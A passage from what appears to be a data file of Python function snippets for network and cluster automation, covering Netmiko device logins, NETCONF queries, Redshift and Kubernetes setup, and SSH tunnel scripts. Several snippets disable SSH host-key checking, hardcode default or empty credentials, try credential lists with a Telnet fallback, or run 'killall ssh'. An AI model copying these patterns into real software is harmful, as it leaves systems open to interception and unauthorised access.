nr.run(task=scp_disable)\n c_print(f\"Failed hosts: {nr.data.failed_hosts}\")\n print(\"~\" * 80)", "def main():\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n hostname = get_hostname(config)\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(\n hostname,\n config.get(\"CLUSTER\", \"DB_NAME\"),\n config.get(\"CLUSTER\", \"DB_USER\"),\n config.get(\"CLUSTER\", \"DB_PASSWORD\"),\n config.get(\"CLUSTER\", \"DB_PORT\"))\n )\n\n cur = conn.cursor()\n drop_tables(cur, conn)\n create_tables(cur, conn)\n\n conn.close()", "def main():\n uilist = {\n 'joyride':(\"Uses a joystick for steering and outputs console text\", joyride),\n 'curses':(\"A simple curses-based output UI with very basic arrow-key steering\", cursesui),\n 'framebuffer':(\"An output intenteded for the on-board computer, with no steering\", framebuffer),\n }\n\n parser = OptionParser()\n\n uigroup = OptionGroup(parser, \"UI options\")\n uigroup.add_option('-u', '--ui', action=\"store\", type=\"choice\", dest=\"ui\", default=\"joyride\", choices=uilist.keys(),\n help=\"Interact with this type of UI [Default: joyride]\")\n uigroup.add_option('-j', '--joystick', action=\"store\", type=\"string\", dest=\"joystick_device\", default=None,\n help=\"Path to the device file of the joystick (for joyride UI) [Default: None]\")\n uigroup.add_option('-s', '--disable-sound', action=\"store_false\", dest=\"sound\", default=True,\n help=\"Disable sound [Default: False]\")\n uigroup.add_option('-i', '--disable-input', action=\"store_false\", dest=\"allow_input\", default=True,\n help=\"Disable input [Default: False]\")\n uigroup.add_option('-c', '--become-controller', action=\"store_true\", dest=\"become_controller\", default=False,\n help=\"Become exclusive controlling connection [Default: False]\")\n uigroup.add_option('-n', '--no-control', action=\"store_false\", dest=\"allow_control\", default=True,\n help=\"Ignore all UI commands from this client [Default: False]\")\n uigroup.add_option(\"--list\", action=\"store_true\", dest=\"list\", default=False,\n help=\"List the available UIs and exit\")\n parser.add_option_group(uigroup)\n\n netgroup = OptionGroup(parser, \"Network options\")\n netgroup.add_option('-a', '--host', action=\"store\", type=\"string\", dest=\"host\", default=\"localhost\",\n help=\"Host/address to connect to [Default: localhost]\")\n netgroup.add_option('-p', '--port', action=\"store\", type=\"int\", dest=\"port\", default=9999,\n help=\"Port the 
server is listening on [Default: 9999]\")\n parser.add_option_group(netgroup)\n\n options, args = parser.parse_args()\n\n list_and_exit = False\n if options.list:\n list_and_exit = True\n\n if not options.ui or options.ui not in uilist:\n print \"You must pick one of the available UIs with --ui\"\n\n if list_and_exit:\n print \"Available UIs:\"\n for name, info in uilist.items():\n print \"%s %s\" % (name.ljust(30), info[0])\n return 0\n\n # create the robot\n robot = Robot(options.host, options.port)\n status = robot.get_status()\n\n # handle gracefully disconnecting the robot if anything else fails\n try:\n # create the ui\n uimod = uilist[options.ui][1]\n ui = uimod.get_ui(**vars(options))\n\n # create the steerer\n steerer = steering.SteeringModel(status)\n\n if options.sound:\n player = sound.SoundPlayer(status)\n player.play(player.SOUNDS['startup'])\n else:\n player = None\n\n # create the robot client\n client = RobotClient(robot, ui, steerer, player, options.allow_control, options.become_controller)\n\n # start up all the pieces in the right order\n if player: player.start()\n try:\n ui.init()\n ui.start()\n try:\n client.run()\n finally:\n ui.stop()\n finally:\n if player:\n player.stop(player.SOUNDS['crash'])\n finally:\n if not robot.disconnected:\n robot.disconnect()", "def main():\n\n PASS = raw_input('password> ')\n\n with manager.connect(host=HOST, port=PORT, username=USER, password=PASS,\n hostkey_verify=False, device_params={'name': 'default'},\n look_for_keys=False, allow_agent=False) as m:\n\n # print all NETCONF capabilities\n with open('output/netconf_101_capability.txt', 'w') as file:\n for capability in m.server_capabilities:\n file.write(str(capability))\n file.write('\\n')\n\n result_xmllist = []\n # run commands on the remote device\n for key in xmlns_dic.keys():\n data = m.get(('subtree', xmlns_dic[key]))\n result_xmllist.append(data)\n\n with open('output/netconf_101_rpc.xml', 'w') as file:\n file.write(str(result_xmllist))\n\n result_jsonlist = []\n for data in result_xmllist:\n # print all in xml\n print(data)\n\n # print all in json\n result_xml_str = repr(data)\n result_json_parsed_str = json.dumps(xmltodict.parse(result_xml_str))\n result_json_parsed_dict = json.loads(result_json_parsed_str)\n\n print(json.dumps(result_json_parsed_dict, indent=4, sort_keys=True))\n result_jsonlist.append(result_json_parsed_dict)\n\n with open('output/netconf_101_rpc.json', 'w') as file:\n json.dump(result_jsonlist, file, indent=4, sort_keys=True)\n\n\n # xml_doc = xml.dom.minidom.parseString(result.xml)\n # mac_address = xml_doc.getElementsByTagName(\"mod:mac_address\")\n # print(mac_address)", "def main():\n arg_fmt = argparse.RawDescriptionHelpFormatter\n parser = argparse.ArgumentParser(formatter_class=arg_fmt,\n description=main.__doc__)\n\n parser.add_argument(\n '-s', '--save', metavar='PATH',\n help='save current EE config to given file'\n )\n parser.add_argument(\n '-l', '--load', metavar='PATH',\n help='load config from given file onto EE'\n )\n args = parser.parse_args(rospy.myargv()[1:])\n\n print(\"Initializing node... 
\")\n rospy.init_node('ee_config_editor', anonymous=True)\n\n ee = intera_interface.get_current_gripper_interface()\n if not ee:\n rospy.logerr(\"Could not detect an attached EndEffector!\")\n return\n\n if args.save:\n rospy.loginfo(\"Saving EE config to {}\".format(args.save))\n save_config(ee, args.save)\n\n if args.load:\n rospy.loginfo(\"Loading config and writing config to ClickSmart from {}\".format(args.load))\n load_config(ee, args.load)\n\n def clean_shutdown():\n print(\"\\nExiting example...\")\n\n rospy.on_shutdown(clean_shutdown)", "def main():\n extremehandle = {\n \"device_type\": \"extreme\",\n \"ip\": \"10.54.116.175\",\n \"username\": \"admin\",\n \"password\": \"\",\n }\n net_connect = ConnectHandler(**extremehandle)\n output = net_connect.send_command(\"show config vlan\")\n print(output)", "def configure():\n parser = argparse.ArgumentParser(description=\"welcome to AutomateBGP!\")\n parser.add_argument('-u', '--username', dest='username',\n help='username to login to nodes')\n parser.add_argument('-p', '--password', dest='password',\n help='password to login to nodes')\n parser.add_argument('-f', '--filename', dest='filename',\n help='text file containing the node data (expected format...)')\n return parser.parse_args()", "def main():\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n print('config file read! - now connecting...')\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n\n print('connection established! - now dropping tables...')\n drop_tables(cur, conn)\n\n print('tables dropped! - now creating tables...')\n create_tables(cur, conn)\n\n print('tables are now created! - closing connection...')\n conn.close()\n\n print('done!')", "def main():\n # Parse arguments.\n parser = argparse.ArgumentParser(description='Console for cluster test.')\n parser.add_argument('-c', dest='command_config_file',\n default='command_config',\n help='set command config file path (default=command_config)')\n args = parser.parse_args()\n\n console = Console()\n console.config(args.command_config_file)\n console.init_proxies()\n console.run()", "def connect():", "def configure(args):\n print('Configures HPC fleet with given name \"{}\"'.format(args))", "def cassandra_nodetool(mycluster=RING_1_dev__allnodes,cmd=\"ring\"):\n print CASSANDRA_NODETOOL\n cmd1 = CASSANDRA_NODETOOL + \" -hlocalhost -p \" + str(PORT) + \" \"\n task_run(cmd1+cmd,mycluster)", "def main(): \n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n\n drop_tables(cur, conn)\n create_tables(cur, conn)\n\n conn.close()", "def cli():\n\n global platform_fanutil\n global platform_chassis\n\n if os.geteuid() != 0:\n click.echo(\"Root privileges are required for this operation\")\n sys.exit(1)\n\n # Load the helper class\n helper = UtilHelper()\n\n if not helper.check_pddf_mode():\n click.echo(\"PDDF mode should be supported and enabled for this platform for this operation\")\n sys.exit(1)\n\n # Load new platform api class\n try:\n import sonic_platform.platform\n platform_chassis = sonic_platform.platform.Platform().get_chassis()\n except Exception as e:\n click.echo(\"Failed to load chassis due to {}\".format(str(e)))\n\n\n # Load platform-specific fanutil class if new platform object class is not found\n if platform_chassis is None:\n try:\n platform_fanutil = 
helper.load_platform_util(PLATFORM_SPECIFIC_MODULE_NAME, PLATFORM_SPECIFIC_CLASS_NAME)\n except Exception as e:\n click.echo(\"Failed to load {}: {}\".format(PLATFORM_SPECIFIC_MODULE_NAME, str(e)))\n sys.exit(2)", "def configure(node):\n script = []\n script.append(Statements.exec(\"hostname %s\" % node.getName()))\n script.append(Statements.createOrOverwriteFile(\n \"/etc/hostname\", [node.getName()]))\n script.append(Statements.exec(\n \"sed -i 's/127.0.0.1/127.0.0.1\\t%s/' /etc/hosts\" % node.getName()))\n return script", "def connect_cluster():\n sfmvip, sfuser, sfpass = get_inputs()\n try:\n sfe = ElementFactory.create(sfmvip,sfuser,sfpass, print_ascii_art=False)\n return sfe\n except Exception as ex:\n if \"Bad Credentials\" in str(ex):\n print(\"Incorrect user or password entered, please re-enter:\\n\")\n sfuser = input(\"Enter user name: \")\n sfpass = getpass(\"Enter password for user {} on cluster {}: \".format(sfuser, sfmvip))\n sfe = ElementFactory.create(sfmvip,sfuser,sfpass, print_ascii_art=False)\n return sfe\n elif \"host has failed to respond\" in str(ex):\n sfmvip = input(\"Please re-enter MVIP: \")\n sfe = ElementFactory.create(sfmvip,sfuser,sfpass, print_ascii_art=False)\n return sfe\n else:\n print(\"Script will exit due to an unhandled exception: \\n{}\".format(str(ex)))\n exit()", "def create_cluster():\n config = get_kube_config()\n command = CLUSTER_CREATE_COMMAND.replace('\\n','').format(cluster_name=config['cluster_name'],\n project_name=config['project_name'],\n machine_type=config['machine_type'],\n disk_size=config['disk_size'],\n nodes=config['nodes'],\n zone=config['zone'])\n print \"Creating cluster by running {}\".format(command)\n subprocess.check_call(shlex.split(command))\n command = AUTH_COMMAND.replace('\\n','').format(cluster_name=config['cluster_name'],\n project_name=config['project_name'],\n zone=config['zone'])\n print \"Authenticating with cluster by running {}\".format(command)\n subprocess.check_call(shlex.split(command))", "def usage():\n\tprint()\n\tprint(\n\t\t'\\t Usage: python conos_aicuu_client.py [-h] [--help] <ENDPOINT> <ENVIRONMENT> <CLIENT_ID> <CLIENT_SECRET> <INPUT_FILE> <OUTPUT_FILE> <NUMBER_THREAD>')\n\tprint('\\t -h : help')\n\tprint('\\t ENDPOINT : 1: /v1.0/person')\n\tprint('\\t 2: /v1.0/company')\n\tprint('\\t ENVIRONMENT : must be one of: dev, test, int, prod')\n\tprint('\\t CLIENT_ID : used for obtaining access token')\n\tprint('\\t CLIENT_SECRET : used for obtaining access token')\n\tprint('\\t INPUT_FILE : location of the request input file')\n\tprint('\\t OUTPUT_FILE : location of the output file (analyze report)')\n\tprint('\\t NUMBER_THREAD : (optional) number of threads to process data (from 1 -> 8, default is 1)')\n\tprint('\\n\\t Example : python conos_aicuu_client.py 1 test Admin 123456 data/person/input.txt data/person/output.txt 5')\n\texit(2)", "def main():\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n\n drop_tables(cur, conn)\n create_tables(cur, conn)\n\n conn.close()", "def main():\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n\n drop_tables(cur, conn)\n create_tables(cur, conn)\n\n conn.close()", "def main():\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = 
psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n\n drop_tables(cur, conn)\n create_tables(cur, conn)\n\n conn.close()", "def main():\n \n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n\n drop_tables(cur, conn)\n create_tables(cur, conn)\n\n conn.close()", "def main(args):\n # server on other machine needs to connect to this machines IP\n client = WheelchairClientProtocol(args)\n client.listen('0.0.0.0', 9999)\n\n # server on this machines needs to connect to other machines IP\n server = WheelchairServerProtocol(args)\n server.connect('192.168.1.106', 9999)", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def main():\n\n ip_filename = arguments.ip_file.strip()\n\n # Set project directory to 'logs' unless an optional directory was given\n if arguments.project_dir:\n project = arguments.project_dir\n else:\n project = 'logs'\n\n if arguments.device_class:\n device_cls = arguments.device_class.strip()\n else:\n # Default device class for Netmiko\n device_cls = 'cisco_ios'\n\n ips = []\n ips = load_txt_file(ip_filename)\n\n total_devices = len(ips)\n # Track devices which fail login or pings\n missing_devices = []\n # Track devices which were successfully accessed\n devices_verified = 0\n\n # Create Directory for show output based on the Project Name\n path = os.path.join(\"./\", project.strip())\n # print path\n if not os.path.exists(path):\n os.makedirs(path)\n print(f\"Created directory: {path}\")\n\n # Create logfile for the discovery run in same directory as the resulting show commands\n # logfilename = project + \"-logfile.log\"\n # logfilename = os.path.join(path, logfilename)\n\n if total_devices > 1:\n heading = f\"##### Executing show commands for discovery project {project} for {str(total_devices)} devices! #####\"\n else:\n heading = f\"##### Executing show commands for discovery project {project} for {str(total_devices)} device! 
#####\"\n\n print(\"#\" * len(heading))\n print(heading)\n print(\"#\" * len(heading))\n\n print(f\"Device IP(s) in project {project}:\")\n for i in ips:\n print(f\"\\t{i}\")\n print(\"--------------------------\")\n print(f\"Total devices: {str(len(ips))}\")\n print(\"#\" * len(heading))\n print(\"\\n\")\n\n ## Default Credentials\n # Default list of credentials in format username, user password, enable password\n credentials = ['cisco, cisco, cisco']\n\n ## Load Credentials if -c or --creds option was used\n if arguments.creds:\n # Override default credentials as a new credential file with one or more sets of credentials was provided\n cred_filename = arguments.creds\n credentials = load_txt_file(cred_filename)\n\n ##### SHOW COMMANDS\n commands = []\n\n ## Load custom show commands if -c or --show option was used\n if arguments.show:\n # Override default list of show commands as a new file with one or more show commands was provided\n show_filename = arguments.show\n custom_showcmds = load_txt_file(show_filename)\n\n # first command to send is an end to get back to the main prompt\n commands = custom_showcmds\n\n else:\n # DEFAULT SHOW COMMANDS\n commands = [\"show version\",\n ]\n\n # if not arguments.pingonly:\n # print(\"Sending \" + str(len(commands)) + \" show commands:\")\n # for x in range(0, len(commands)):\n # print(\"\\t\" + commands[x])\n\n # For each IP in the ip address file, attempt to ping, attempt to log in, attempt to enter enable mode and\n # execute and save show command output\n for mgmt_ip in ips:\n\n login_success = False\n enable_success = False\n output = ''\n hostname = \"dev_\" + mgmt_ip\n\n # If Ping is successful attempt to log in and if that is successful attempt to enter enable mode and\n # execute list of show commands\n device_pings = ping_device(mgmt_ip)\n\n if device_pings:\n print(f\"Device {mgmt_ip} Responds to Pings!\\n\")\n\n # If the -i or --icmppingonly option was provided when the script was called, then only execute the ping code.\n if arguments.icmppingonly:\n # Keep a count of the devices that are pingable\n devices_verified += 1\n # Skip everything else as the icmp ping only option was given\n continue\n\n if len(credentials) > 1:\n print(\"**** Attempting multiple credentials to access device....\")\n\n try_telnet = False\n # Credential Loop\n for line in credentials:\n\n lineitem = line.split(',')\n uname = lineitem[0].strip()\n upwd = lineitem[1].strip()\n epwd = lineitem[2].strip()\n\n if not try_telnet:\n\n print(f\"\\t**** Attempting user credentials for {uname} with SSH.\")\n\n try:\n dev_conn = ConnectHandler(device_type=device_cls, ip=mgmt_ip, username=uname, password=upwd,\n secret=epwd)\n login_success = True\n\n\n except NetMikoAuthenticationException:\n print(f\"\\tNetMikoAuthenticationException: Device failed SSH Authentication with username {uname}\")\n missing_devices = missing_device_log(missing_devices, mgmt_ip, 'Failed Authentication')\n login_success = False\n # continue\n\n except (EOFError, SSHException, NetMikoTimeoutException):\n print('\\tSSH is not enabled for this device.')\n missing_devices = missing_device_log(missing_devices, mgmt_ip, 'Failed SSH')\n login_success = False\n try_telnet = True\n # continue\n\n except Exception as e:\n print(\"\\tGeneral Exception: ERROR!:\" + str(sys.exc_info()[0]) + \"==>\" + str(sys.exc_info()[1]))\n print(str(e))\n missing_devices = missing_device_log(missing_devices, mgmt_ip, 'General Exception')\n login_success = False\n # continue\n\n if login_success:\n print(\"\\t**** SSH 
Login Succeeded! Will not attempt login with any other credentials.\")\n # Break out of credential loop\n break\n else:\n print(\"\\t**** SSH Login Failed!\")\n # continue\n\n # Try Telnet\n if try_telnet:\n print(\"\\t**** Attempting user credentials for \" + uname + \" with Telnet.\")\n\n try:\n dev_conn = ConnectHandler(device_type='cisco_ios_telnet', ip=mgmt_ip, username=uname,\n password=upwd,\n secret=epwd)\n login_success = True\n\n except NetMikoAuthenticationException:\n print(f\"\\tNetMikoAuthenticationException: Device failed SSH Authentication with username {uname}\")\n missing_devices = missing_device_log(missing_devices, mgmt_ip, 'Failed Authentication')\n login_success = False\n continue\n\n except Exception as e:\n print(\"\\tGeneral Exception: ERROR!:\" + str(sys.exc_info()[0]) + \"==>\" + str(sys.exc_info()[1]))\n print(str(e))\n missing_devices = missing_device_log(missing_devices, mgmt_ip, 'General Exception')\n login_success = False\n continue\n\n if login_success:\n print(\"\\t**** Telnet Login Succeeded! Will not attempt login with any other credentials.\")\n # Break out of credential loop\n break\n else:\n print(\"\\t**** Telnet Login Failed!\")\n continue\n\n if login_success:\n # Check to see if login has resulted in enable mode (i.e. priv level 15)\n is_enabled = dev_conn.check_enable_mode()\n\n if not is_enabled:\n try:\n dev_conn.enable()\n enable_success = True\n except Exception as e:\n print(str(e))\n print(\"\\tCannot enter enter enable mode on device!\")\n missing_devices = missing_device_log(missing_devices, mgmt_ip, 'failed enable')\n enable_success = False\n continue\n else:\n print(\"\\tDevice already in enabled mode!\")\n enable_success = True\n\n if enable_success:\n\n for cmd in commands:\n output += dev_conn.send_command(cmd, strip_prompt=False, strip_command=False)\n dev_conn.exit_config_mode()\n dev_conn.disconnect()\n\n # output contains a stream of text vs individual lines\n # split into individual lies for further parsing\n # output_lines = re.split(r'[\\n\\r]+', output)\n\n # show_info = get_show_info(output_lines)\n #\n # if show_info['hostname']:\n # hostname = show_info.pop('hostname')\n\n # print(\"Information for device: \" + hostname)\n # for k, v in show_info.items():\n # print(\"\\t\" + k +\"\\t\\t-\\t\" + v)\n\n # Save output to file\n timestr = time.strftime(\"%Y%m%d-%H%M%S\")\n\n log_filename = hostname + \"-\" + timestr + \".txt\"\n log_filename = os.path.join(path, log_filename)\n\n log_file = open(log_filename, 'w')\n log_file.write(\"!#Output file for device \" + hostname + \"\\n\")\n log_file.write(\"!#Commands executed on \" + timestr + \"\\n\\r\")\n log_file.write(\"!\\n\")\n log_file.write(output)\n log_file.close()\n devices_verified += 1\n print(\"\\nOutput results saved in: \" + log_filename + \"\\n\\n\")\n\n\n else:\n # Device does not PING\n print(\"Device is unreachable\")\n missing_devices.append(mgmt_ip)\n\n # Totals Verification\n if arguments.icmppingonly:\n info = (\"Total number of devices in IP list:\\t\\t\" + str(total_devices) + \"\\n\",\n \"Total number of devices which responded to pings:\\t\" + str(devices_verified) + \"\\n\")\n else:\n info = (\"Total number of devices in IP list:\\t\\t\" + str(total_devices) + \"\\n\",\n \"Total number of show command output files:\\t\" + str(devices_verified) + \"\\n\")\n\n\n # Print Note on totals\n for note in info:\n print(note)", "def __init__(self, hostname, python=None, tunnel_incoming=False,\n tunnel_outgoing=False, identity_filename=None,beforestart=\"\"):\n 
self.beforestart=beforestart\n super(openmdao.main.resource.ClusterHost, self).__init__(hostname, python, tunnel_incoming, tunnel_outgoing, identity_filename)", "def connect():\n\n crate = get_crate()\n crate.mch_comms.ipmitool_shell_connect()", "def main():\n\n # create an auth ticket for APIC-EM\n\n global APIC_EM_TICKET # make the ticket a global variable in this module\n APIC_EM_TICKET = get_service_ticket()\n\n # build a list with all device id's\n switch_id_list = get_switch_ids()\n switches_info = collect_switch_info(switch_id_list)\n\n # ask user for filename input and save file\n filename = get_input_file()\n output_file = open(filename, 'w', newline='')\n output_writer = csv.writer(output_file)\n for lists in switches_info:\n output_writer.writerow(lists)\n output_file.close()\n # pprint(switches_info) # print for data validation", "def setup_node(config, args):\n if args.templates:\n config['templates'].insert(0, args.templates)\n config.templates = config._templates()\n stdin, stderr = args.node.ssh(config.template(\"scripts/node_setup.sh\"))\n if stderr:\n print stderr\n else:\n print u\"Node ready at %s\" % (args.node.hostname)", "def main():\n\n # Define the path to the config file, and read it.\n conf_file = os.path.join(os.path.abspath(os.path.dirname(os.path.dirname(__file__))), 'conf', 'config.toml')\n configuration = read_config_file(conf_file)\n\n # Set our variables based on what is read from the config file.\n rs_url = configuration['platform']['url']\n api_key = configuration['platform']['api_key']\n client_id = configuration['platform']['client_id']\n\n # Specify ID for group that you would like to move your hosts to.\n group_id = 0 # UPDATE THIS WITH YOUR DESIRED GROUP ID\n\n # Move the hosts to the new group.\n print(f\"Moving host(s) to new group({group_id}).\")\n print()\n\n # Call the function to move your hosts\n successful = move_hosts_to_new_group(rs_url, api_key, client_id, group_id)\n\n if successful:\n print(\"The move was successful.\")\n\n else:\n print(\"The attempted move was not successful.\")", "def configure_orc8r():\n print('#### Configuring orc8r ####')\n subprocess.check_call(\n 'fab --fabfile=dev_tools.py register_federated_vm',\n shell=True, cwd=agw_path,\n )\n subprocess.check_call(\n 'fab register_feg_gw', shell=True, cwd=feg_path,\n )", "def main():\n config = get_config(CONFIG_FILENAME)\n print(\"Creating IAM role\")\n role = create_iam_role(config)\n print(\"Creating redshift cluster\")\n create_redshift_cluster(config, role)", "def run():\n partitions = libcalamares.globalstorage.value(\"partitions\")\n root_mount_point = libcalamares.globalstorage.value(\"rootMountPoint\")\n\n if not partitions:\n libcalamares.utils.warning(\"partitions is empty, {!s}\".format(partitions))\n return (_(\"Configuration Error\"),\n _(\"No partitions are defined for <pre>{!s}</pre> to use.\" ).format(\"initcpiocfg\"))\n if not root_mount_point:\n libcalamares.utils.warning(\"rootMountPoint is empty, {!s}\".format(root_mount_point))\n return (_(\"Configuration Error\"),\n _(\"No root mount point is given for <pre>{!s}</pre> to use.\" ).format(\"initcpiocfg\"))\n\n modify_mkinitcpio_conf(partitions, root_mount_point)\n\n return None", "def main():\n if len(sys.argv) != 5:\n print ('usage: %s <SRC_USER::SRC_PASSWD@@SRC_HOST> '\n '<DEST_USER:DEST_PASSWD@DEST_HOST> SRC_GW DEST_GW\\n'\n ' where\\n'\n ' HOST Aviatrix Controller hostname or IP\\n'\n ' USER Aviatrix Controller login username\\n'\n ' PASSWORD Aviatrix Controller login password\\n'\n ' GW name of a 
provisioned gateway\\n' % sys.argv[0])\n sys.exit(1)\n\n # connect to both controllers\n src_controller = get_controller_from_argument(sys.argv[1])\n dst_controller = get_controller_from_argument(sys.argv[2])\n\n # find the source gateway\n gw_name = sys.argv[3]\n src_gwy = src_controller.get_gateway_by_name('admin', gw_name)\n if not src_gwy:\n print 'Source gateway %s not found\\n' % (gw_name)\n return\n\n # find the destination gateway\n gw_name = sys.argv[4]\n dst_gwy = dst_controller.get_gateway_by_name('admin', gw_name)\n if not dst_gwy:\n print 'Destination gateway %s not found\\n' % (gw_name)\n return\n\n # clone the firewall policies and the FQDN filters\n clone_fw_rules(src_controller, src_gwy, dst_controller, dst_gwy)\n clone_fqdn_rules(src_controller, src_gwy, dst_controller, dst_gwy)", "def main():\n partition = 'Common'\n login, pwd, device = get_device_data()\n mgmt = ManagementRoot(login, pwd, device)\n ltm = mgmt.tm.ltm\n pools = ltm.pools.get_collection()\n nodes = ltm.nodes.get_collection()\n display_nodes(nodes)\n display_pools(pools)\n virtuals = ltm.virtuals.get_collection()\n display_virtuals(virtuals)", "def write_flow_csh(self):\n str = self.LicLocalPort\n fout = open(self.cshBatch2File+\".csh\",\"w\")\n fout.write(\"\"\"\\\n#!/bin/csh\n\nif ( $#argv == 0 ) then\n echo \"\"\n echo \"USAGE: $0 [-powerOnDemand] javaBatchFile.java Simulation.sim\"\n echo \"\"\n exit\nendif\n\nset powerOnDemand=0\nset javaBatchFile=$1\nset simFile=$2\nset powerOnDemandLicense=\"\"\nif ( \"$1\" == \"-powerOnDemand\" ) then\n set powerOnDemand=1\n set javaBatchFile=$2\n set simFile=$3\n set powerOnDemandLicense=\"-licpath %s@localhost -podkey %s\"\nendif\n\"\"\" % (str,self.starccmLic))\n\n fout.write(\"\"\"\\\n\nalias echo \"/bin/echo -e\"\necho \"\\\\n#==============================================\"\necho \"# Begin Star Simulation\"\necho \"# Java Batch File = $javaBatchFile\"\necho \"# sim File = $simFile\"\nif ( $powerOnDemand == 1 ) echo \"# Using Power on Demand license.\"\nset starttime = `date`\necho \"# Start Time = ${starttime}\\\\n\"\n\nif ( $powerOnDemand == 1 ) then\n echo \"\\\\n# Running 'killall ssh' to clear out all prior tunnels.\"\n killall ssh\n echo \"\\\\n# Making a tunnel for the Power on Demand License.\"\n ssh -f -L %s:flex.cd-adapco.com:1999 -L 2099:flex.cd-adapco.com:2099 -N %s\n echo \"\\\\n# Checking to see if there is a valid port tunnel in place for the Power on Demand License.\"\n ps -ef | grep '%s:flex.cd-adapco.com:1999'\nendif\n\"\"\" % (str,self.LicAccessName,str))\n\n fout.write(\"\"\"\\\n\nsetenv CDLMD_LICENSE_FILE %s\nunsetenv LM_LICENSE_FILE\n\nset lnodes=`cat $PBS_NODEFILE`\nset llnodes = `echo $lnodes | sed 's/ /,/g'`\n#echo \"llnodes = $llnodes\"\nset numCores = `echo $llnodes | sed 's/,/ /g' | wc -w`\n\nset EXEC = \"%s\"\n\n$EXEC -power ${powerOnDemandLicense} \\\\\n -on $llnodes \\\\\n -rsh 'ssh -o stricthostkeychecking=no' \\\\\n -classpath ~/bin \\\\\n -load \\\\\n -batch $javaBatchFile \\\\\n $simFile\nset endtime = `date`\necho \"# End Time = ${endtime}\"\necho \"# Start Time = ${starttime}\\\\n\"\necho \"# End Star Simulation\\\\n\"\n\"\"\" % (self.CDLMD_LicFile, self.starccmExec))\n\n fout.close()", "def main() -> None:\n parser = argparse.ArgumentParser(description=\"Flower\")\n parser.add_argument(\n \"--server_address\",\n type=str,\n default=DEFAULT_SERVER_ADDRESS,\n help=f\"gRPC server address (default: {DEFAULT_SERVER_ADDRESS})\",\n )\n parser.add_argument(\n \"--cid\", type=str, required=True, help=\"Client CID (no default)\"\n 
)\n parser.add_argument(\n \"--log_host\", type=str, help=\"Logserver address (no default)\",\n )\n parser.add_argument(\n \"--nb_clients\", type=int, default=10, help=\"Total number of clients\",\n )\n args = parser.parse_args()\n\n # Configure logger\n fl.common.logger.configure(f\"client_{args.cid}\", host=args.log_host)\n\n # Load model and data\n #model = cifar.load_model()\n #model.to(DEVICE)\n #trainset, testset = cifar.load_data()\n\n # Start client\n #client = CifarClient(args.cid, model, trainset, testset, args.nb_clients)\n #client = CifarClient(args.cid, trainset, testset, args.nb_clients)\n client = CifarClient(args.cid,args.nb_clients)\n fl.client.start_client(args.server_address, client)", "def provision():\n sudo('chef-client')", "def main():\n executor(option().host)", "def start(args, config):\n print('Starts an HPC fleet: \"{}\"'.format(args))", "def create_cluster(module, switch_list):\n global CHANGED_FLAG\n output = ''\n new_cluster = False\n\n node1 = switch_list[0]\n node2 = switch_list[1]\n\n name = node1 + '-' + node2 + '-cluster'\n\n cli = pn_cli(module)\n cli += ' switch %s cluster-show format name no-show-headers ' % node1\n cluster_list = run_cli(module, cli)\n\n if cluster_list is not None:\n cluster_list = cluster_list.split()\n if name not in cluster_list:\n new_cluster = True\n\n if new_cluster or cluster_list is None:\n cli = pn_cli(module)\n cli += ' switch %s cluster-create name %s ' % (node1, name)\n cli += ' cluster-node-1 %s cluster-node-2 %s ' % (node1, node2)\n run_cli(module, cli)\n CHANGED_FLAG.append(True)\n output += '%s: Created cluster %s\\n' % (node1, name)\n\n return output", "def createConnectionToCli(self):\n connected = False\n # loop until connected\n while not connected:\n try:\n self.dataClient = Client(\n ('localhost', 5000), authkey=b'secret password')\n connected = True\n except ConnectionRefusedError:\n pass\n\n self.logger.debug('Connected to Process!')", "def main():\n # Creating resources/clients for all needed infrastructure: EC2, IAM, Redshift\n ec2 = create_client('ec2', boto3.resource)\n iam = create_client('iam', boto3.client)\n redshift = create_client('redshift', boto3.client)\n \n # Create needed IAM / ARN roles for Redshift\n create_iam_role(iam)\n arn_role = create_arn_role(iam)\n \n # Create cluster and await its completion\n create_redshift_cluster(redshift, arn_role)\n cluster_props = query_redshift_status(redshift)\n \n # Get endpoint into to allow querying\n info = get_redshift_endpoint_info(redshift, cluster_props)\n print(info)\n # TODO: Save info to aws.cfg\n \n # Update security groups to ACTUALLY allow querying\n update_cluster_security_group(ec2, cluster_props)\n \n # Test connection to see that everything (hopefully) went well\n test_connection()\n \n # End of main\n return", "def main():\n\n # endpdoint = \"restconf/data/ietf-interfaces:interfaces\"\n # endpoint = f\"restconf/data/ietf-interfaces:interfaces/interface={name}\"\n\n if len(argv) > 1:\n try:\n inventory = load_inventory(argv[1])\n except FileExistsError as err:\n print(\"FileExistsError: \", err)\n else:\n print(\"You must provide a path to your inventory file.\")\n sys.exit()\n\n r1 = inventory['dev-r1']\n loop = [interface for interface in r1[\"interface\"] if interface[\"name\"] == \"Loopback0\"][0]\n\n payload = render_payload(\n loop,\n \"interface.j2\"\n )\n\n session = create_session(r1[\"username\"], r1[\"password\"])\n endpoint = f\"restconf/data/ietf-interfaces:interfaces/interface=Loopback0\"\n results = 
